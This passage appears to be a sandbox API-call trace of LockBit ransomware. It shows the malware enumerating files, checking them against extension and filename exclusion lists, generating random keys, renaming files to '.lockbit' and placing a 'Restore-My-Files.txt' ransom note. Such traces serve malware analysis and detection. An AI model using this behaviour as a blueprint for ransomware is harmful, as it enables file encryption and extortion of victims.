Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.777] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00389_.WMF") returned=".WMF" [0161.777] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0161.777] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0161.777] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0161.777] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0161.777] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0161.777] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0161.777] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0161.777] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0161.777] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0161.777] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0161.777] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0161.777] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0161.777] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0161.777] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0161.777] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0161.777] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0161.778] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0161.778] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0161.778] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0161.778] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0161.778] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0161.778] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0161.778] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0161.778] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0161.778] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0161.778] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0161.778] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0161.778] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0161.778] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00389_.WMF.lockbit") returned 72 [0161.778] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00389_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00389_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0161.783] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.783] malloc (_Size=0x40068) returned 0x3d70450 [0161.783] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=8394) returned 1 [0161.783] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.783] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.784] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0161.784] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.784] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.784] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0161.784] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0161.787] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00389_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00389_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.787] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.787] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0161.788] free (_Block=0x1fa2ed8) [0161.788] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00389_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.788] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.789] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.789] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5af4bb00, ftCreationTime.dwHighDateTime=0x1bd4aeb, ftLastAccessTime.dwLowDateTime=0x594ac510, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5af4bb00, ftLastWriteTime.dwHighDateTime=0x1bd4aeb, nFileSizeHigh=0x0, nFileSizeLow=0x21c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA00390_.WMF", cAlternateFileName="")) returned 1 [0161.789] lstrcmpiW (lpString1=".", lpString2="NA00390_.WMF") returned -1 [0161.789] lstrcmpiW (lpString1="..", lpString2="NA00390_.WMF") returned -1 [0161.789] PathFindExtensionW (pszPath="NA00390_.WMF") returned=".WMF" [0161.789] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0161.789] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0161.789] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0161.789] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0161.789] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0161.789] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0161.789] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0161.789] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0161.789] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0161.789] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0161.789] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0161.789] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0161.789] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0161.789] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0161.789] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0161.789] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0161.790] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0161.790] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0161.790] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0161.790] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0161.790] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0161.790] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0161.790] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0161.790] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0161.790] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.790] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0161.790] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0161.790] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0161.790] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0161.790] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0161.790] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0161.790] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0161.790] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0161.790] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0161.790] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0161.790] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0161.790] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0161.790] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0161.790] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0161.790] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0161.791] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0161.791] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0161.791] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.791] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0161.791] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0161.791] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0161.791] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0161.791] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA00390_.WMF") returned 1 [0161.791] lstrcmpiW (lpString1="ntldr", lpString2="NA00390_.WMF") returned 1 [0161.791] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA00390_.WMF") returned 1 [0161.791] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA00390_.WMF") returned -1 [0161.791] lstrcmpiW (lpString1="autorun.inf", lpString2="NA00390_.WMF") returned -1 [0161.791] lstrcmpiW (lpString1="thumbs.db", lpString2="NA00390_.WMF") returned 1 [0161.791] lstrcmpiW (lpString1="iconcache.db", lpString2="NA00390_.WMF") returned -1 [0161.791] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.791] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00390_.WMF") returned=".WMF" [0161.791] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0161.791] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0161.791] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0161.791] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0161.791] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0161.791] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0161.791] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0161.792] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0161.792] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0161.792] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0161.792] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0161.792] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0161.792] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0161.792] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0161.792] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0161.792] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0161.792] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0161.792] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0161.792] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0161.792] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0161.792] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0161.792] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0161.792] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0161.792] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0161.792] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0161.792] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0161.792] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0161.792] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0161.792] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00390_.WMF.lockbit") returned 72 [0161.792] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00390_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00390_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0161.794] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.794] malloc (_Size=0x40068) returned 0x3df0008 [0161.794] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=8642) returned 1 [0161.794] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.794] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.795] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0161.795] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.795] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.795] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0161.795] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.800] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00390_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00390_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.800] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.800] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0161.801] free (_Block=0x1fa2ed8) [0161.801] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00390_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.801] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.801] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.801] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde161100, ftCreationTime.dwHighDateTime=0x1bd4aeb, ftLastAccessTime.dwLowDateTime=0x6a3248d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xde161100, ftLastWriteTime.dwHighDateTime=0x1bd4aeb, nFileSizeHigh=0x0, nFileSizeLow=0x21ec, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA00391_.WMF", cAlternateFileName="")) returned 1 [0161.801] lstrcmpiW (lpString1=".", lpString2="NA00391_.WMF") returned -1 [0161.801] lstrcmpiW (lpString1="..", lpString2="NA00391_.WMF") returned -1 [0161.802] PathFindExtensionW (pszPath="NA00391_.WMF") returned=".WMF" [0161.802] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0161.802] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0161.802] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0161.802] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0161.802] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0161.802] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0161.802] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0161.802] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0161.802] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0161.802] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0161.802] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0161.802] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0161.802] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0161.802] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0161.802] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0161.802] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0161.802] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0161.802] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0161.802] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0161.803] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0161.803] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0161.803] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0161.803] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0161.803] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0161.803] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.803] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0161.803] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0161.803] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0161.803] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0161.803] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0161.803] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0161.803] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0161.803] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0161.803] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0161.803] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0161.803] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0161.803] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0161.803] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0161.803] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0161.803] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0161.804] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0161.804] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0161.804] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.804] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0161.804] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0161.804] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0161.804] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0161.804] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA00391_.WMF") returned 1 [0161.804] lstrcmpiW (lpString1="ntldr", lpString2="NA00391_.WMF") returned 1 [0161.804] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA00391_.WMF") returned 1 [0161.804] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA00391_.WMF") returned -1 [0161.804] lstrcmpiW (lpString1="autorun.inf", lpString2="NA00391_.WMF") returned -1 [0161.804] lstrcmpiW (lpString1="thumbs.db", lpString2="NA00391_.WMF") returned 1 [0161.804] lstrcmpiW (lpString1="iconcache.db", lpString2="NA00391_.WMF") returned -1 [0161.804] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.804] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00391_.WMF") returned=".WMF" [0161.804] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0161.804] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0161.804] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0161.804] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0161.805] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0161.805] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0161.805] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0161.805] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0161.805] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0161.805] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0161.805] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0161.805] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0161.805] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0161.805] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0161.805] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0161.805] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0161.805] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0161.805] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0161.805] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0161.805] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0161.805] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0161.805] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0161.805] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0161.805] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0161.805] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0161.806] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0161.806] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0161.806] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0161.806] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00391_.WMF.lockbit") returned 72 [0161.806] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00391_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00391_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0161.807] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.807] malloc (_Size=0x40068) returned 0x3f70048 [0161.807] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=8684) returned 1 [0161.807] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.808] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.808] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0161.808] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.808] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.808] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0161.808] ReadFile (in: hFile=0x308, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0161.813] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00391_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00391_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.813] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.813] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0161.815] free (_Block=0x1fa2ed8) [0161.815] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00391_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.815] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.815] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.815] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24e62400, ftCreationTime.dwHighDateTime=0x1bd4b49, ftLastAccessTime.dwLowDateTime=0x6a3248d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x24e62400, ftLastWriteTime.dwHighDateTime=0x1bd4b49, nFileSizeHigh=0x0, nFileSizeLow=0x2ad4, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA00394_.WMF", cAlternateFileName="")) returned 1 [0161.815] lstrcmpiW (lpString1=".", lpString2="NA00394_.WMF") returned -1 [0161.815] lstrcmpiW (lpString1="..", lpString2="NA00394_.WMF") returned -1 [0161.815] PathFindExtensionW (pszPath="NA00394_.WMF") returned=".WMF" [0161.815] lstrcmpiW (lpString1=".386", 